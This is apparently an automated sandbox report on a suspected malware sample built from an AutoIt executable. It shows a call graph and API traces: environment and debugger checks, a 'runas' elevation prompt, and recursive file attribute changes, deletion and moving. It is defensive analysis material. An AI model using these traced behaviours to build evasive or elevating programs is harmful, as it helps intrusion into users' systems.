95521->95503 95523 59bf07 8 API calls 95522->95523 95524 5ffd53 95523->95524 95525 59bf07 8 API calls 95524->95525 95526 5ffd5c 95525->95526 95527 59bf07 8 API calls 95526->95527 95530 5ffd65 95527->95530 95528 5b6718 GetStringTypeW 95528->95530 95529 600029 95529->95516 95530->95528 95530->95529 95531 59acc0 8 API calls 95530->95531 95532 5984b7 8 API calls 95530->95532 95534 5ffd21 40 API calls 95530->95534 95535 5b6661 39 API calls 95530->95535 95536 59be6d 8 API calls 95530->95536 95538 5b6742 GetStringTypeW _strftime 95530->95538 95531->95530 95532->95530 95534->95530 95535->95530 95536->95530 95537->95515 95538->95530 95539 5bf08e 95540 5bf09a ___scrt_is_nonwritable_in_current_image 95539->95540 95541 5bf0bb 95540->95541 95542 5bf0a6 95540->95542 95552 5b951d EnterCriticalSection 95541->95552 95558 5bf669 20 API calls _abort 95542->95558 95545 5bf0ab 95559 5c2b7c 26 API calls _abort 95545->95559 95546 5bf0c7 95553 5bf0fb 95546->95553 95551 5bf0b6 __fread_nolock 95552->95546 95561 5bf126 95553->95561 95555 5bf108 95556 5bf0d4 95555->95556 95581 5bf669 20 API calls _abort 95555->95581 95560 5bf0f1 LeaveCriticalSection __fread_nolock 95556->95560 95558->95545 95559->95551 95560->95551 95562 5bf14e 95561->95562 95563 5bf134 95561->95563 95565 5bdce5 __fread_nolock 26 API calls 95562->95565 95585 5bf669 20 API calls _abort 95563->95585 95567 5bf157 95565->95567 95566 5bf139 95586 5c2b7c 26 API calls _abort 95566->95586 95582 5c9799 95567->95582 95570 5bf144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 95570->95555 95572 5bf25b 95574 5bf20e 95572->95574 95575 5bf268 95572->95575 95573 5bf1df 95573->95574 95577 5bf1fc 95573->95577 95574->95570 95589 5bf2bb 30 API calls 2 library calls 95574->95589 95588 5bf669 20 API calls _abort 95575->95588 95587 5bf43f 31 API calls 4 library calls 95577->95587 95579 5bf206 95579->95570 95581->95556 95590 5c9616 95582->95590 95584 5bf173 95584->95570 95584->95572 95584->95573 95585->95566 95586->95570 95587->95579 95588->95570 95589->95570 95591 5c9622 ___scrt_is_nonwritable_in_current_image 95590->95591 95592 5c962a 95591->95592 95593 5c9642 95591->95593 95625 5bf656 20 API calls _abort 95592->95625 95595 5c96f6 95593->95595 95599 5c967a 95593->95599 95630 5bf656 20 API calls _abort 95595->95630 95596 5c962f 95626 5bf669 20 API calls _abort 95596->95626 95615 5c54d7 EnterCriticalSection 95599->95615 95600 5c96fb 95631 5bf669 20 API calls _abort 95600->95631 95601 5c9637 __fread_nolock 95601->95584 95604 5c9680 95606 5c96b9 95604->95606 95607 5c96a4 95604->95607 95605 5c9703 95632 5c2b7c 26 API calls _abort 95605->95632 95616 5c971b 95606->95616 95627 5bf669 20 API calls _abort 95607->95627 95611 5c96a9 95628 5bf656 20 API calls _abort 95611->95628 95614 5c96b4 95629 5c96ee LeaveCriticalSection __wsopen_s 95614->95629 95615->95604 95617 5c5754 __wsopen_s 26 API calls 95616->95617 95618 5c972d 95617->95618 95619 5c9735 95618->95619 95620 5c9746 SetFilePointerEx 95618->95620 95633 5bf669 20 API calls _abort 95619->95633 95622 5c973a 95620->95622 95623 5c975e GetLastError 95620->95623 95622->95614 95634 5bf633 20 API calls __dosmaperr 95623->95634 95625->95596 95626->95601 95627->95611 95628->95614 95629->95601 95630->95600 95631->95605 95632->95601 95633->95622 95634->95622 95635 59f48c 95638 59ca50 95635->95638 95639 59ca6b 95638->95639 95640 5e14af 95639->95640 95641 5e1461 95639->95641 95661 59ca90 95639->95661 95679 6161ff 254 API calls 2 library calls 95640->95679 95644 5e146b 95641->95644 95646 5e1478 95641->95646 95641->95661 95677 616690 254 API calls 95644->95677 95665 59cd60 95646->95665 95678 616b2d 254 API calls 2 library calls 95646->95678 95651 59cf30 39 API calls 95651->95661 95652 5e1742 95652->95652 95653 5ae781 39 API calls 95653->95661 95655 59cd8e 95657 5e168b 95681 616569 81 API calls 95657->95681 95660 59bdc1 39 API calls 95660->95661 95661->95651 95661->95653 95661->95655 95661->95657 95661->95660 95664 59b3fe 8 API calls 95661->95664 95661->95665 95666 5a02f0 254 API calls 95661->95666 95667 59be6d 8 API calls 95661->95667 95669 5ae73b 39 API calls 95661->95669 95670 5aaa19 254 API calls 95661->95670 95671 5b05d2 5 API calls __Init_thread_wait 95661->95671 95672 5abbd2 8 API calls 95661->95672 95673 5b0433 29 API calls __onexit 95661->95673 95674 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95661->95674 95675 5af4ed 81 API calls 95661->95675 95676 5af354 254 API calls 95661->95676 95680 5eff4f 8 API calls 95661->95680 95664->95661 95665->95655 95682 603ef6 81 API calls __wsopen_s 95665->95682 95666->95661 95667->95661 95669->95661 95670->95661 95671->95661 95672->95661 95673->95661 95674->95661 95675->95661 95676->95661 95677->95646 95678->95665 95679->95661 95680->95661 95681->95665 95682->95652 95683 5a15af 95684 5ae34f 8 API calls 95683->95684 95685 5a15c5 95684->95685 95690 5ae3b3 95685->95690 95687 5a15ef 95688 5e61ab 95687->95688 95702 603ef6 81 API calls __wsopen_s 95687->95702 95691 597a14 8 API calls 95690->95691 95692 5ae3ea 95691->95692 95693 59b25f 8 API calls 95692->95693 95695 5ae41b 95692->95695 95694 5ee4e4 95693->95694 95696 597af4 8 API calls 95694->95696 95695->95687 95697 5ee4ef 95696->95697 95703 5ae73b 39 API calls 95697->95703 95699 5ee502 95700 59b3fe 8 API calls 95699->95700 95701 5ee506 95699->95701 95700->95701 95701->95701 95702->95688 95703->95699 95704 5e1a68 95705 5e1a70 95704->95705 95708 59d4e5 95704->95708 95750 5f79af 8 API calls __fread_nolock 95705->95750 95707 5e1a82 95751 5f7928 8 API calls __fread_nolock 95707->95751 95710 5b016b 8 API calls 95708->95710 95712 59d539 95710->95712 95711 5e1aac 95713 5a02f0 254 API calls 95711->95713 95734 59c2cd 95712->95734 95714 5e1ad3 95713->95714 95716 5e1ae7 95714->95716 95752 6160a2 53 API calls _wcslen 95714->95752 95719 5b016b 8 API calls 95722 59d61e ISource 95719->95722 95720 5e1b04 95720->95708 95753 5f79af 8 API calls __fread_nolock 95720->95753 95724 59be6d 8 API calls 95722->95724 95725 59b3fe 8 API calls 95722->95725 95727 5e1f1c 95722->95727 95729 5e1f37 95722->95729 95732 59d8c1 ISource 95722->95732 95741 59c34b 95722->95741 95723 59c34b 8 API calls 95731 59d95c ISource 95723->95731 95724->95722 95725->95722 95754 5f55d9 8 API calls ISource 95727->95754 95733 59d973 95731->95733 95749 5ae284 8 API calls ISource 95731->95749 95732->95723 95732->95731 95738 59c2dd 95734->95738 95735 59c2e5 95735->95719 95736 5b016b 8 API calls 95736->95738 95737 59bf07 8 API calls 95737->95738 95738->95735 95738->95736 95738->95737 95739 59be6d 8 API calls 95738->95739 95740 59c2cd 8 API calls 95738->95740 95739->95738 95740->95738 95742 59c359 95741->95742 95743 59c381 ISource 95741->95743 95744 59c367 95742->95744 95745 59c34b 8 API calls 95742->95745 95743->95722 95746 59c36d 95744->95746 95747 59c34b 8 API calls 95744->95747 95745->95744 95746->95743 95748 59c780 8 API calls 95746->95748 95747->95746 95748->95743 95749->95731 95750->95707 95751->95711 95752->95720 95753->95720 95754->95729 95755 5c948a 95756 5c9497 95755->95756 95760 5c94af 95755->95760 95805 5bf669 20 API calls _abort 95756->95805 95758 5c949c 95806 5c2b7c 26 API calls _abort 95758->95806 95761 5c950a 95760->95761 95769 5c94a7 95760->95769 95807 5d0164 21 API calls 2 library calls 95760->95807 95763 5bdce5 __fread_nolock 26 API calls 95761->95763 95764 5c9522 95763->95764 95775 5c8fc2 95764->95775 95766 5c9529 95767 5bdce5 __fread_nolock 26 API calls 95766->95767 95766->95769 95768 5c9555 95767->95768 95768->95769 95770 5bdce5 __fread_nolock 26 API calls 95768->95770 95771 5c9563 95770->95771 95771->95769 95772 5bdce5 __fread_nolock 26 API calls 95771->95772 95773 5c9573 95772->95773 95774 5bdce5 __fread_nolock 26 API calls 95773->95774 95774->95769 95776 5c8fce ___scrt_is_nonwritable_in_current_image 95775->95776 95777 5c8fee 95776->95777 95778 5c8fd6 95776->95778 95780 5c90b4 95777->95780 95785 5c9027 95777->95785 95809 5bf656 20 API calls _abort 95778->95809 95816 5bf656 20 API calls _abort 95780->95816 95781 5c8fdb 95810 5bf669 20 API calls _abort 95781->95810 95783 5c90b9 95817 5bf669 20 API calls _abort 95783->95817 95787 5c904b 95785->95787 95788 5c9036 95785->95788 95808 5c54d7 EnterCriticalSection 95787->95808 95811 5bf656 20 API calls _abort 95788->95811 95790 5c9043 95818 5c2b7c 26 API calls _abort 95790->95818 95792 5c9051 95794 5c906d 95792->95794 95795 5c9082 95792->95795 95793 5c903b 95812 5bf669 20 API calls _abort 95793->95812 95813 5bf669 20 API calls _abort 95794->95813 95800 5c90d5 __fread_nolock 38 API calls 95795->95800 95797 5c8fe3 __fread_nolock 95797->95766 95802 5c907d 95800->95802 95801 5c9072 95814 5bf656 20 API calls _abort 95801->95814 95815 5c90ac LeaveCriticalSection __wsopen_s 95802->95815 95805->95758 95806->95769 95807->95761 95808->95792 95809->95781 95810->95797 95811->95793 95812->95790 95813->95801 95814->95802 95815->95797 95816->95783 95817->95790 95818->95797 95819 591044 95824 592735 95819->95824 95821 59104a 95860 5b0433 29 API calls __onexit 95821->95860 95823 591054 95861 5929da 95824->95861 95828 5927ac 95829 59bf07 8 API calls 95828->95829 95830 5927b6 95829->95830 95831 59bf07 8 API calls 95830->95831 95832 5927c0 95831->95832 95833 59bf07 8 API calls 95832->95833 95834 5927ca 95833->95834 95835 59bf07 8 API calls 95834->95835 95836 592808 95835->95836 95837 59bf07 8 API calls 95836->95837 95838 5928d4 95837->95838 95871 592d5e 95838->95871 95842 592906 95843 59bf07 8 API calls 95842->95843 95844 592910 95843->95844 95845 5a30e0 9 API calls 95844->95845 95846 59293b 95845->95846 95892 5930ed 95846->95892 95848 592957 95849 592967 GetStdHandle 95848->95849 95850 5929bc 95849->95850 95851 5d39c1 95849->95851 95854 5929c9 OleInitialize 95850->95854 95851->95850 95852 5d39ca 95851->95852 95853 5b016b 8 API calls 95852->95853 95855 5d39d1 95853->95855 95854->95821 95899 6009d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 95855->95899 95857 5d39da 95900 601200 CreateThread 95857->95900 95859 5d39e6 CloseHandle 95859->95850 95860->95823 95901 592a33 95861->95901 95864 592a33 8 API calls 95865 592a12 95864->95865 95866 59bf07 8 API calls 95865->95866 95867 592a1e 95866->95867 95868 5984b7 8 API calls 95867->95868 95869 59276b 95868->95869 95870 593205 6 API calls 95869->95870 95870->95828 95872 59bf07 8 API calls 95871->95872 95873 592d6e 95872->95873 95874 59bf07 8 API calls 95873->95874 95875 592d76 95874->95875 95876 59bf07 8 API calls 95875->95876 95877 592d91 95876->95877 95878 5b016b 8 API calls 95877->95878 95879 5928de 95878->95879 95880 59318c 95879->95880 95881 59319a 95880->95881 95882 59bf07 8 API calls 95881->95882 95883 5931a5 95882->95883 95884 59bf07 8 API calls 95883->95884 95885 5931b0 95884->95885 95886 59bf07 8 API calls 95885->95886 95887 5931bb 95886->95887 95888 59bf07 8 API calls 95887->95888 95889 5931c6 95888->95889 95890 5b016b 8 API calls 95889->95890 95891 5931d8 RegisterWindowMessageW 95890->95891 95891->95842 95893 5d3c69 95892->95893 95894 5930fd 95892->95894 95908 603b63 8 API calls 95893->95908 95896 5b016b 8 API calls 95894->95896 95897 593105 95896->95897 95897->95848 95898 5d3c74 95899->95857 95900->95859 95909 6011e6 14 API calls 95900->95909 95902 59bf07 8 API calls 95901->95902 95903 592a3e 95902->95903 95904 59bf07 8 API calls 95903->95904 95905 592a46 95904->95905 95906 59bf07 8 API calls 95905->95906 95907 592a08 95906->95907 95907->95864 95908->95898 95910 5d27a2 95913 592a52 95910->95913 95914 592a91 mciSendStringW 95913->95914 95915 5d39f4 DestroyWindow 95913->95915 95916 592d08 95914->95916 95917 592aad 95914->95917 95927 5d3a00 95915->95927 95916->95917 95919 592d17 UnregisterHotKey 95916->95919 95918 592abb 95917->95918 95917->95927 95945 592e70 95918->95945 95919->95916 95921 5d3a45 95926 5d3a58 FreeLibrary 95921->95926 95928 5d3a69 95921->95928 95922 5d3a1e FindClose 95922->95927 95924 597953 FindCloseChangeNotification 95924->95927 95925 592ad0 95925->95928 95933 592ade 95925->95933 95926->95921 95927->95921 95927->95922 95927->95924 95929 5d3a7d VirtualFree 95928->95929 95936 592b4b 95928->95936 95929->95928 95930 592b3a OleUninitialize 95930->95936 95931 5d3ac5 95938 5d3ad4 ISource 95931->95938 95951 603c45 6 API calls ISource 95931->95951 95932 592b56 95935 592b66 95932->95935 95933->95930 95949 592f86 VirtualFreeEx CloseHandle 95935->95949 95936->95931 95936->95932 95941 5d3b63 95938->95941 95952 5f6d63 8 API calls ISource 95938->95952 95940 592b7c 95940->95938 95942 592c61 95940->95942 95941->95941 95942->95941 95950 592eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 95942->95950 95944 592d03 95947 592e7d 95945->95947 95946 592ac2 95946->95921 95946->95925 95947->95946 95953 5f78b9 8 API calls 95947->95953 95949->95940 95950->95944 95951->95931 95952->95938 95953->95947

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 278 595d78-595de7 call 59bf07 GetVersionExW call 5984b7 283 5d4f0c-5d4f1f 278->283 284 595ded 278->284 286 5d4f20-5d4f24 283->286 285 595def-595df1 284->285 287 5d4f4b 285->287 288 595df7-595e56 call 5996d9 call 5979ed 285->288 289 5d4f27-5d4f33 286->289 290 5d4f26 286->290 294 5d4f52-5d4f5e 287->294 303 5d50ad-5d50b4 288->303 304 595e5c-595e5e 288->304 289->286 291 5d4f35-5d4f37 289->291 290->289 291->285 293 5d4f3d-5d4f44 291->293 293->283 296 5d4f46 293->296 297 595ecc-595ee6 GetCurrentProcess IsWow64Process 294->297 296->287 299 595ee8 297->299 300 595f45-595f4b 297->300 302 595eee-595efa 299->302 300->302 305 595f00-595f0f LoadLibraryA 302->305 306 5d50f2-5d50f6 GetSystemInfo 302->306 309 5d50d4-5d50d7 303->309 310 5d50b6 303->310 307 5d4fae-5d4fc1 304->307 308 595e64-595e67 304->308 313 595f4d-595f57 GetSystemInfo 305->313 314 595f11-595f1f GetProcAddress 305->314 315 5d4fea-5d4fec 307->315 316 5d4fc3-5d4fcc 307->316 308->297 317 595e69-595eab 308->317 311 5d50d9-5d50e8 309->311 312 5d50c2-5d50ca 309->312 318 5d50bc 310->318 311->318 321 5d50ea-5d50f0 311->321 312->309 323 595f27-595f29 313->323 314->313 322 595f21-595f25 GetNativeSystemInfo 314->322 319 5d4fee-5d5003 315->319 320 5d5021-5d5024 315->320 324 5d4fce-5d4fd4 316->324 325 5d4fd9-5d4fe5 316->325 317->297 326 595ead-595eb0 317->326 318->312 329 5d5005-5d500b 319->329 330 5d5010-5d501c 319->330 331 5d505f-5d5062 320->331 332 5d5026-5d5041 320->332 321->312 322->323 333 595f2b-595f2c FreeLibrary 323->333 334 595f32-595f44 323->334 324->297 325->297 327 5d4f63-5d4f6d 326->327 328 595eb6-595ec0 326->328 338 5d4f6f-5d4f7b 327->338 339 5d4f80-5d4f8a 327->339 328->294 335 595ec6 328->335 329->297 330->297 331->297 340 5d5068-5d508f 331->340 336 5d504e-5d505a 332->336 337 5d5043-5d5049 332->337 333->334 335->297 336->297 337->297 338->297 341 5d4f9d-5d4fa9 339->341 342 5d4f8c-5d4f98 339->342 343 5d509c-5d50a8 340->343 344 5d5091-5d5097 340->344 341->297 342->297 343->297 344->297
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00595DA7
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              • GetCurrentProcess.KERNEL32(?,0062DC2C,00000000,?,?), ref: 00595ED3
                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00595EDA
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00595F05
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00595F17
                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00595F25
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00595F2C
                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00595F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                              • API String ID: 3290436268-3101561225
                                                                                              • Opcode ID: f535c9d98bfd61b5551da32fb7f8f9d60c30b7a640bb2a1fcbb034a6c5dd3ef1
                                                                                              • Instruction ID: 9a8c8df65b3278b5a1b9ea008865e49a0adcd9916d46d4883147a0064ed7ea12
                                                                                              • Opcode Fuzzy Hash: f535c9d98bfd61b5551da32fb7f8f9d60c30b7a640bb2a1fcbb034a6c5dd3ef1
                                                                                              • Instruction Fuzzy Hash: 5EA18231A0AFD3CFCB22CB68BC641997F567B26700B147C9AE485B7361D3B94548CB25
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005932EF,?), ref: 00593342
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005932EF,?), ref: 00593355
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00662418,00662400,?,?,?,?,?,?,005932EF,?), ref: 005933C1
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                                • Part of subcall function 005941E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005933E9,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00594227
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00593442
                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 005D3C8A
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 005D3CCB
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006531F4,00662418,?,?,?,?,?,?,?,005932EF), ref: 005D3D54
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 005D3D5B
                                                                                                • Part of subcall function 0059345A: GetSysColorBrush.USER32(0000000F), ref: 00593465
                                                                                                • Part of subcall function 0059345A: LoadCursorW.USER32(00000000,00007F00), ref: 00593474
                                                                                                • Part of subcall function 0059345A: LoadIconW.USER32(00000063), ref: 0059348A
                                                                                                • Part of subcall function 0059345A: LoadIconW.USER32(000000A4), ref: 0059349C
                                                                                                • Part of subcall function 0059345A: LoadIconW.USER32(000000A2), ref: 005934AE
                                                                                                • Part of subcall function 0059345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005934C6
                                                                                                • Part of subcall function 0059345A: RegisterClassExW.USER32(?), ref: 00593517
                                                                                                • Part of subcall function 0059353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00593568
                                                                                                • Part of subcall function 0059353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00593589
                                                                                                • Part of subcall function 0059353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 0059359D
                                                                                                • Part of subcall function 0059353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 005935A6
                                                                                                • Part of subcall function 005938F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005939C3
                                                                                              Strings
                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 005D3C84
                                                                                              • AutoIt, xrefs: 005D3C7F
                                                                                              • runas, xrefs: 005D3D4F
                                                                                              • 0$f, xrefs: 0059341C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                              • String ID: 0$f$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                              • API String ID: 683915450-2534309212
                                                                                              • Opcode ID: 9f63a33529fb235cda344aac3ab280fd18f583100cc8e898626f82ce5c0cb274
                                                                                              • Instruction ID: b784be508925d490d3f1eccc7b0c61aa34f78dc41e86822abbe5f2900bc6c933
                                                                                              • Opcode Fuzzy Hash: 9f63a33529fb235cda344aac3ab280fd18f583100cc8e898626f82ce5c0cb274
                                                                                              • Instruction Fuzzy Hash: 9151E430108743EEDF11EF64EC5A96E7FEABFD1744F441429F481522A2DF648A4ACB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 409 609f9f-609fc7 FindFirstFileW 410 609fc9-609fde call 5b55c2 409->410 411 60a03a-60a045 FindClose 409->411 421 609fe0-609ff5 call 5b55c2 410->421 422 60a028-60a038 FindNextFileW 410->422 412 60a0e2 411->412 413 60a04b-60a05e FindFirstFileW 411->413 415 60a0e4-60a0e8 412->415 416 60a060-60a066 413->416 417 60a0d9 413->417 420 60a069-60a070 416->420 419 60a0db-60a0dc FindClose 417->419 419->412 423 60a072-60a087 call 5b55c2 420->423 424 60a0c7-60a0d7 FindNextFileW 420->424 421->422 428 609ff7-60a020 GetFileAttributesW SetFileAttributesW 421->428 422->410 422->411 423->424 432 60a089-60a09e call 5b55c2 423->432 424->417 424->420 430 60a026 428->430 431 60a0eb-60a0f4 FindClose 428->431 430->422 431->415 432->424 435 60a0a0-60a0be SetCurrentDirectoryW call 609f9f 432->435 438 60a0c0-60a0c5 SetCurrentDirectoryW 435->438 439 60a0f6-60a0f8 435->439 438->424 439->419
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,75568FB0,?,00000000), ref: 00609FC0
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00609FFE
                                                                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 0060A018
                                                                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 0060A030
                                                                                              • FindClose.KERNEL32(00000000), ref: 0060A03B
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0060A057
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0060A0A7
                                                                                              • SetCurrentDirectoryW.KERNEL32(00657B94), ref: 0060A0C5
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0060A0CF
                                                                                              • FindClose.KERNEL32(00000000), ref: 0060A0DC
                                                                                              • FindClose.KERNEL32(00000000), ref: 0060A0EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1409584000-438819550
                                                                                              • Opcode ID: 84aae54e9fdd7f6241fdb8c93d7dff7467a06e6b4f0e22a060a011fa8583b3e6
                                                                                              • Instruction ID: c5b31b2ebf92683fcbbbe2dfe1013846322a5ecd591ea90ae94c7909081d2c32
                                                                                              • Opcode Fuzzy Hash: 84aae54e9fdd7f6241fdb8c93d7dff7467a06e6b4f0e22a060a011fa8583b3e6
                                                                                              • Instruction Fuzzy Hash: 1731E33264171DABDB28DFF4EC49ADF77AEAF053A5F104055E902E21D0EB30DE458A21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1816 5fd836-5fd894 call 59bf07 * 3 call 59557e * 2 call 5fe958 call 5fe9c5 1831 5fd89f-5fd8a9 call 5fe9c5 1816->1831 1832 5fd896-5fd89a call 5965a4 1816->1832 1836 5fd8ab-5fd8af call 5965a4 1831->1836 1837 5fd8b4-5fd8f2 call 59bf07 * 2 call 59694e FindFirstFileW 1831->1837 1832->1831 1836->1837 1845 5fd8f8 1837->1845 1846 5fda23-5fda2a FindClose 1837->1846 1848 5fd8fe-5fd900 1845->1848 1847 5fda2d-5fda5b call 59bd2c * 5 1846->1847 1848->1846 1850 5fd906-5fd90d 1848->1850 1852 5fd9ef-5fda02 FindNextFileW 1850->1852 1853 5fd913-5fd979 call 59b25f call 5fdf85 call 59bd2c call 597af4 call 5965a4 call 5fdc8e 1850->1853 1852->1848 1856 5fda08-5fda0d 1852->1856 1875 5fd99f-5fd9a3 1853->1875 1876 5fd97b-5fd97e 1853->1876 1856->1848 1879 5fd9a5-5fd9a8 1875->1879 1880 5fd9d1-5fd9d7 call 5fda5c 1875->1880 1877 5fd984-5fd99b call 5ae2e5 1876->1877 1878 5fda12-5fda21 FindClose call 59bd2c 1876->1878 1887 5fd9ad-5fd9b6 MoveFileW 1877->1887 1893 5fd99d DeleteFileW 1877->1893 1878->1847 1884 5fd9aa 1879->1884 1885 5fd9b8-5fd9c8 call 5fda5c 1879->1885 1889 5fd9dc 1880->1889 1884->1887 1885->1878 1894 5fd9ca-5fd9cf DeleteFileW 1885->1894 1891 5fd9df-5fd9e1 1887->1891 1889->1891 1891->1878 1895 5fd9e3-5fd9eb call 59bd2c 1891->1895 1893->1875 1894->1891 1895->1852
                                                                                              APIs
                                                                                                • Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E
                                                                                                • Part of subcall function 005FE9C5: GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 005FD8E2
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 005FD99D
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 005FD9B0
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD9CD
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 005FD9F7
                                                                                                • Part of subcall function 005FDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,005FD9DC,?,?), ref: 005FDA72
                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 005FDA13
                                                                                              • FindClose.KERNEL32(00000000), ref: 005FDA24
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
